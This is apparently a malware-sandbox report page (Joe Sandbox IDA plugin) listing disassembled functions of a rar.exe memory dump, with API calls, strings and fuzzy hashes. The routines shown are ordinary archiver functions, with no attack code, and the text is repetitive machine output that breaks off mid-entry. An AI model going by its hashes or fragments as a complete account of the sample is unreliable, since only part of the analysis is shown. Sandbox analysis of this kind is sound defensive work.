Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID: H9
API String ID: 0-2207570329
Opcode ID: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
Instruction ID: adabf471da5fab69f0338cb77fa590333666fff68ef69ed0536ebfdfa5c0b538
Opcode Fuzzy Hash: c5ebd6c55152d2db874ee1ad0a7897bbb9475bd8dcfe15870fa8873135614add
Instruction Fuzzy Hash: 07E1AC63A08A92C5EB20DB24E048BFD27E5EB45B8CF4555BACE4D87786DF38E954C700

Function 00007FF695CF2574 Relevance: 7.6, APIs: 5, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 00007FF695CF25B0
WriteFile.KERNEL32 ref: 00007FF695CF25F9
WriteFile.KERNELBASE ref: 00007FF695CF262E
GetLastError.KERNEL32 ref: 00007FF695CF2658
SetLastError.KERNEL32 ref: 00007FF695CF2689

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorFileLastWrite$Handle
String ID:
API String ID: 3350704910-0
Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction ID: 82d5a13673fba512509a25b5c791e389a768840dd33c72a54e1139076c8ca213
Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
Instruction Fuzzy Hash: 30515E26A08642C6EA34DF25E81437A77F0EB45F84F541179DE4E8BAA1CF3CE845C644

Function 00007FF695CF1E80 Relevance: 7.6, APIs: 5, Instructions: 127
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF695CF1F4A
GetLastError.KERNEL32 ref: 00007FF695CF1F59
CreateFileW.KERNELBASE ref: 00007FF695CF1F99
GetLastError.KERNEL32 ref: 00007FF695CF1FA2
SetFileTime.KERNEL32 ref: 00007FF695CF1FF1

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction ID: 5ab1b1d44ac4a0d6ea94d7dd2b7b20facd787108d5c3155c99ca7bfcc57714ef
Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
Instruction Fuzzy Hash: 9C41E273A1868186FB748F24E5057B96AE0E745BB8F541338DE79876C4DF7CC8898B40

Function 00007FF695CE6AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF695CE6C13

Strings

switches=, xrefs: 00007FF695CE6B80
switches_%ls=, xrefs: 00007FF695CE6C03
rar.ini, xrefs: 00007FF695CE6B37

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: swprintf
String ID: rar.ini$switches=$switches_%ls=
API String ID: 233258989-2235180025
Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction ID: f75bb392ce774016513464b1a20d73f592312c502e6213001c4bd32b9d1f64c7
Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
Instruction Fuzzy Hash: E941C622A1868281EB24EB21F8111F963F0FF44B94F402279EA5E836D5DF7CDD89C304

Function 00007FF695D07E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF695D1B470: GetModuleHandleW.KERNEL32 ref: 00007FF695D1B488
Part of subcall function 00007FF695D1B470: GetProcAddress.KERNEL32 ref: 00007FF695D1B4A0
Part of subcall function 00007FF695D1B470: GetProcAddress.KERNEL32 ref: 00007FF695D1B4D5

Part of subcall function 00007FF695CE7A68: setbuf.LIBCMT ref: 00007FF695CE7A7B
Part of subcall function 00007FF695CE7A68: setbuf.LIBCMT ref: 00007FF695CE7A8F

SetErrorMode.KERNELBASE ref: 00007FF695D07E5D
GetModuleHandleW.KERNEL32 ref: 00007FF695D07E65

Part of subcall function 00007FF695D148CC: GetVersionExW.KERNEL32(?,?,?,00007FF695D07E7D), ref: 00007FF695D1496A
Part of subcall function 00007FF695D148CC: LoadLibraryExW.KERNELBASE(?,?,?,00007FF695D07E7D), ref: 00007FF695D14993

new.LIBCMT ref: 00007FF695D07EA8

Strings

rar.lng, xrefs: 00007FF695D07E7D

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
String ID: rar.lng
API String ID: 553376247-2410228151
Opcode ID: 7e1301cb8d14e0988d3300aafa180966a10fc4473626eed87f904aa64d252951
Instruction ID: e82f094982c87416ffcee3684eee38523c444ad066757c70c22fcaf1e0582b47
Opcode Fuzzy Hash: 7e1301cb8d14e0988d3300aafa180966a10fc4473626eed87f904aa64d252951
Instruction Fuzzy Hash: 77419222E0D28385FA34AB20A4121B927E1DF51F54F5422B9E94DCB2D7CE6DEC0E8759

Function 00007FF695D040A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(?,00000800,?,00007FF695D04432,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D040C4
SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695D040DF
SHGetPathFromIDListW.SHELL32 ref: 00007FF695D040F1

Part of subcall function 00007FF695CF3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF695D0413F,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF34A0
Part of subcall function 00007FF695CF3458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF695D0413F,?,?,?,?,00000800,00000000,00000000,00007FF695D038CB,?,?,?,00007FF695D041EC), ref: 00007FF695CF34D5

Strings

WinRAR, xrefs: 00007FF695D0410F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
String ID: WinRAR
API String ID: 977838571-3970807970
Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction ID: 4be86d14994a0760169d145f174f5d8c9d11b1bfec9171d4c8614700e4284350
Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Instruction Fuzzy Hash: 8D219316A08B4291EA609F22F8501BA53A1EF89FE0F496172DF0E87799DE3CD848C744

Function 00007FF695CF1C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,?,?,00007FF695CF21A7,00000000,00000028,?,00007FF695CE7792), ref: 00007FF695CF1C97
ReadFile.KERNELBASE ref: 00007FF695CF1CB6
GetLastError.KERNEL32 ref: 00007FF695CF1CEA
GetLastError.KERNEL32 ref: 00007FF695CF1D08

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction ID: 126bc08f584d1fbcd9781a969216d695ee049bff97d354697ccbfab685912c74
Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Instruction Fuzzy Hash: 34219022E08946C2FA708B21E40437966F4FF51F98F2041B9EE59CB6C8CF2DDC449741

Function 00007FF695CE49F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

default.sfx, xrefs: 00007FF695CE4AB0
AFUM, xrefs: 00007FF695CE4B8C

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID:
String ID: AFUM$default.sfx
API String ID: 0-2491287583
Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction ID: 709d2c6851a511b6948463c94ad08be97209c3a70bb62ac461590dfb2edc7f6e
Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
Instruction Fuzzy Hash: 8681D423E0C682E0EB709B1081822BD22F0EF51F84F4491B9DE8D976C6DF6DAD89C754

Function 00007FF695D33B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF695D33B36
GetModuleFileNameA.KERNELBASE(?,?,?,?,?,00007FF695D2B066), ref: 00007FF695D33B57

Strings

C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe, xrefs: 00007FF695D33B45

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe
API String ID: 3307058713-3541919097
Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction ID: 7c578070e661db9381252f5d0dc978d0902421068b26b9bc0008fc4525e4d3bf
Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction Fuzzy Hash: A8418D32A08A5285EB34DF25A9400B867E4EF44F98B546275E94EC7B95DF3DE849C308

Function 00007FF695D365BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF695D3662E
GetFileType.KERNELBASE ref: 00007FF695D36644

Strings

@, xrefs: 00007FF695D3666F

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction ID: 0a85f10918fc8817e918c10ec892dbf197bc14133d947533039cbaa9443c0a3b
Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
Instruction Fuzzy Hash: BA219822A1874241EB788B25B49013926D5EB45FB8F2423B5DA6F877D8CF38DC85C309

Function 00007FF695D1B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF695D1B9F8
SetThreadPriority.KERNEL32 ref: 00007FF695D1BA4E

Part of subcall function 00007FF695CECDA4: wcschr.LIBVCRUNTIME ref: 00007FF695CECE0F
Part of subcall function 00007FF695CECDA4: wcschr.LIBVCRUNTIME ref: 00007FF695CECE22

Part of subcall function 00007FF695CECA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF695CECEDE

Strings

CreateThread failed, xrefs: 00007FF695D1BA06

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Threadwcschr$CreateExceptionPriorityThrow
String ID: CreateThread failed
API String ID: 1217111108-3849766595
Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction ID: 2fd90fb4d8ea702f50806fee249fb01387714d6dd4185b13c86f4a60d41b623d
Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
Instruction Fuzzy Hash: 1D115B32A09A42C2FB24DB10E8411B973B0FB84F84F549275EA9D87669DF3CED4AC744

Function 00007FF695D1BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00007FF695D1BB79), ref: 00007FF695D1BBB9
SetEvent.KERNEL32 ref: 00007FF695D1BBCF
LeaveCriticalSection.KERNEL32 ref: 00007FF695D1BBD8

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID:
API String ID: 3094578987-0
Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction ID: 2b1dda1a4501d50375e9715cffd7e16b9fd0a65c7295f8c20d68ee709cc3ed92
Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction Fuzzy Hash: 0BF08622608B4683EA349F21F68007963A0FF89F99F045370DE9D4B6A9CF3CD94D8B04

Function 00007FF695D32488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF695D3246C), ref: 00007FF695D324B0
TerminateProcess.KERNEL32(?,?,?,00007FF695D3246C), ref: 00007FF695D324BB
ExitProcess.KERNEL32 ref: 00007FF695D324CA

Memory Dump Source

Source File: 00000067.00000002.2422125034.00007FF695CD1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF695CD0000, based on PE: true

Associated: 00000067.00000002.2422092068.00007FF695CD0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422226086.00007FF695D58000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422259960.00007FF695D59000.00000008.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D5A000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D64000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D6E000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422291349.00007FF695D76000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422425142.00007FF695D78000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000067.00000002.2422459095.00007FF695D7E000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff695cd0000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: 5ce63aee431abb8d5e09071f86b44b46b57178b33090a5582740dd18b950ffce
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: 16E01A20E0871542EA64AF2098853792392EF95F85F0066B8CC0E873D3CE3DAC4C8394

Function 00007FF695CE7B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B4A
GetFileType.KERNELBASE(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B56
GetConsoleMode.KERNEL32(?,?,?,00007FF695CE7A9E), ref: 00007FF695CE7B69

